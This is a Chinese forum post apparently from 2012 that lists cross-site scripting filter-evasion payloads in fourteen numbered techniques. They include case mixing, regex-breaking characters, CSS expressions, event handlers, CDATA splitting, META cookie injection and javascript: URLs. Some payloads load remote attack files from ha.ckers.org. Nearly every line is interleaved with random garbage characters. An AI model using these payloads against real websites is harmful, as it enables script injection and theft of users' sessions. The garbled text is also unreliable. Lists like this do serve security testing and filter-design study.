1. 改变字符大小写$ \# Q% h& j# Z4 K1 K2 R/ {3 e( O
: l4 m: Y' ?+ ]
) {# ?+ [' s6 j+ @. F3 i
D5 o: N) T' [) @: b! n. m3 H <sCript>alert(‘d’)</scRipT>
, N6 D, u" i6 A5 `
5 v6 d2 |3 F2 J- }2. 利用多加一些其它字符来规避Regular Expression的检查
# z0 I0 V/ t s" i9 V6 r: v/ g4 a
<<script>alert(‘c’)//<</script>
* ^1 S5 n9 F/ V V
: x5 R' `" ~# C& |8 h& Q* q <SCRIPT a=">" SRC="t.js"></SCRIPT>
7 E; b J1 s F+ a7 a; y
5 H: b$ I( t. M, K <SCRIPT =">" SRC="t.js"></SCRIPT>* `8 {# J+ d N2 ?# A) X' G
7 e! [& S* I% o- r6 a) \7 {
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>. w$ p/ B: w! x# ~; q
9 j, j5 B# G d <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
( C- V+ o, m3 h F- w
7 Z+ R9 C5 U5 p6 H+ A2 W6 E% v3 w <SCRIPT a=`>` SRC="t.js"></SCRIPT>! p" y+ }: ]2 d0 p
' j( A9 t' J& L! q <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
6 C+ U, T7 q0 @+ ]9 ?
) I) q* D0 v& X2 N) B3. 以其它扩展名取代.js4 f9 Y& O7 p2 i3 |* r
. E( ~$ {, L; Z6 a+ T' i+ h
<script src="bad.jpg"></script>
# j$ [7 |( ^# j* V3 B# R
/ L2 N, F, b* B+ V+ R6 W4. 将Javascript写在CSS档里
2 w' c4 S% q% D+ C$ v$ o. `+ f# r8 x. Z, @% D
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> F! A' C z8 i1 e4 {
" m8 y$ n& z% m4 m. i
example:
7 B; @7 A' s4 S4 s! {* C ^# F% L$ P) _6 {! w# Y$ v* m9 B
body {/ |& P+ M1 Q, `* \! b: O& ?
# t% Q ^# ]5 D7 ]3 |( w5 _ background-image: url(‘javascript:alert("XSS");’)& |2 r, z5 }5 U( X/ n
6 O/ D) B4 }9 E
}
0 } [( C; _6 a5 }7 r3 ~& a# }8 ^% b- c+ u( o7 H5 Q9 e4 U
5. 在script的tag里加入一些其它字符
1 f$ \; d* Z! s3 @# h( o L3 a9 k' z
<SCRIPT/SRC="t.js"></SCRIPT>7 Q( M7 Z9 d ]+ C
9 w* D/ a+ Y$ ?# _5 F <SCRIPT/anyword SRC="t.js"></SCRIPT>
0 `9 ]7 }: \8 r' S9 r% A; H# V0 x2 y t2 c' ?( |# c
6. 使用tab或是new line来规避
/ o. P$ B* @& R$ I: ]7 L: z' x/ v; U: e* `; r( a2 w( W
<img src="jav ascr ipt:alert(‘XSS3′)">
* E# P/ @: o+ C9 D% d
! Z" D# |+ T c9 s% u! A <img src="jav ascr ipt:alert(‘XSS3′)">
" N/ Y# |6 x0 j6 P5 _% n# N. t" i3 O9 @
<IMG SRC="jav ascript:alert(‘XSS’);">
( c7 l7 Q% J6 X, {/ H6 x2 _6 Y$ d
-> tag
" \5 N* ^& s1 q Q3 x- R# U" l# I3 D* Y2 v9 K: `! G. D$ o7 T
-> new line% B7 L; z; g: [1 f2 r
# Q8 _ ?8 X7 ~0 L) J" P$ {
7. 使用"\"来规避
% a4 H# x: ]" h. q1 |3 o9 q& ?# {$ Z2 |+ r. y4 Q; |+ z$ K
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
1 r7 G& i; O3 N# ^
# O5 G' w6 n1 ^5 s' o9 w <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
+ N' c9 F2 y- ~. @
C4 @7 Z- h& e/ \6 w1 t6 t <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">* u7 y# x5 v, x" I' P" S
: t+ N4 p" |2 P J& k/ u1 \, N <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
" Y) E% N2 K$ k! v4 E( ?5 l) A
6 N, O G+ S9 Y- U% Y <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>, T' n# {. ^- ~4 u+ i' W2 N Y
, x# F8 h. E( x7 M8. 使用Hex encode来规避(也可能会把";"拿掉)9 Y8 v- l) ^/ M/ ^+ F- t
g/ y" ?" m% c$ C
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">& r+ v5 v8 F% f6 q! }9 f7 {1 Z
) l1 j+ u( p$ a' c I- C" x9 S% h, p 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">3 D$ E8 f7 U, b) k8 ]. E
, k% {$ {9 `) L <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">, u* E, e( L$ x* Q$ a
/ v' ^3 }; U ~4 i
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">8 ~+ O# a# H1 h+ J/ ?. ?: U! {3 Q6 Y" J
# G, b2 I _; q. i5 ?, V0 y- o
9. script in HTML tag. H8 [; y+ G3 I- t7 c$ v) B- d5 E
9 K+ E* }' R7 V+ e2 H% U: D) o
<body onload=」alert(‘onload’)」>$ K5 X/ {7 b' r7 a" l! s8 o
& X, m1 s# F0 |$ E, ?2 u onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload+ [( f9 q$ D5 j( ~) w$ J' i
& C! d% _' x8 m# j10. 在swf里含有xss的code
2 o a$ I0 ~) M" K" b1 @' R0 ~3 ]$ y5 B
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
* o# _- @5 s0 x8 n. u; D% b) t( N" Q# T7 e5 L1 o
11. 利用CDATA将xss的code拆开,再组合起来。+ ^+ Q7 x4 q3 _! |
~# a1 c( i, p$ D- ?
<XML ID=I><X><C>7 W3 H7 D+ [8 O" f3 Y
6 C5 d8 T8 d! h0 ~) t# ~ <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>. S% Z0 E4 W: r7 X) u" H2 N
2 e$ e: q$ i+ m
</C></X>
3 ?: t5 F* c1 k+ L( \) I4 l+ f' [. Q. m# y: d9 }* {" N( M
</xml>' N2 O' Q' G0 h( [4 |- V
5 A- R+ W8 g/ @5 ~, r: Y3 r
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
9 `- L# M! P5 [$ {/ B% [
; M+ |4 K E/ F# O <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
4 I8 u$ y' j* I \; e/ P
) R. Z! T; T3 l6 z% C x4 f <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
! [5 N) T+ A! E+ {8 A f# W2 H/ J9 j+ [$ C7 R* v: G, o8 G
12. 利用HTML+TIME。
D( E/ P( q/ |$ M4 C
% L. I3 l4 ^5 p7 A8 H5 I s! G <HTML><BODY>: i8 E" p) h& V
9 l6 t- `: c( X3 I
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">+ K5 }9 @% a( M, L: v5 r
5 K5 r, ?! u4 N
<?import namespace="t" implementation="#default#time2">
# N$ A$ V7 `0 d. J
8 C3 j# g8 Z4 ?2 k1 Q* v5 ~6 m2 q4 \ <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">4 J X: J$ x: Q* i! N; `
% O( M7 R n0 X. m2 Q </BODY></HTML>
y& |- x3 q5 a# k* e9 d5 C
- T/ g5 u) e) y G1 S! j13. 透过META写入Cookie。. \6 x8 \+ u$ G6 _- T, G+ G+ s
! K! Y V) f- Z& X) Q) d% z- O: @ <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">8 H. v, c2 O, S, z
. F( |1 u+ i, J( |
14. javascript in src , href , url
$ o; K. m$ o, Z; V6 q% }( T* F* i
* g9 C# n, I& L <IFRAME SRC=javascript:alert(’13′)></IFRAME>* @1 U& t* C) z2 _# o. F+ X6 G
7 A% _$ I$ ^5 \* \* y) |
<img src="javascript:alert(‘XSS3′)">
* u+ S5 i7 M8 e( Q6 A9 O9 e- M( c9 `$ @) b% _ d7 \' K
<IMG DYNSRC="javascript:alert(‘XSS20′)">% D5 _( Q7 B4 M
9 R- X- ~4 ^. T6 T$ H <IMG LOWSRC="javascript:alert(‘XSS21′)">
5 F" T+ x1 d/ G4 }) x n9 A+ \. f$ \0 r+ g9 F i
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
1 H9 p- C- a( M4 W7 ]" w z! n: w* c3 j: o1 O' x' a
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
4 W7 B3 o( I- I5 _, P3 W
4 w2 m% O% u# M7 y* ~ <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
1 f) n" l5 x# J. e4 h2 c; X9 M1 {% D! O! y& ?. n" ?
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
* v5 n9 A' ^' \: c2 s& [
0 [$ O+ |0 y) c3 ?* y <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
8 K+ f# Y1 V0 @4 s2 H: Z+ Q" H! t% N! z/ ^ F
</STYLE><A CLASS=XSS></A>/ l; e# p' Q x% c# j9 R* M
# d- y; E. x) o# e2 @
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>0 ?. v0 @& v4 h5 e0 Z# A* x Q, r
2 g1 P% E R3 D: C8 E0 } |
发表于 2012-12-31 09:59:28
收藏
支持
反对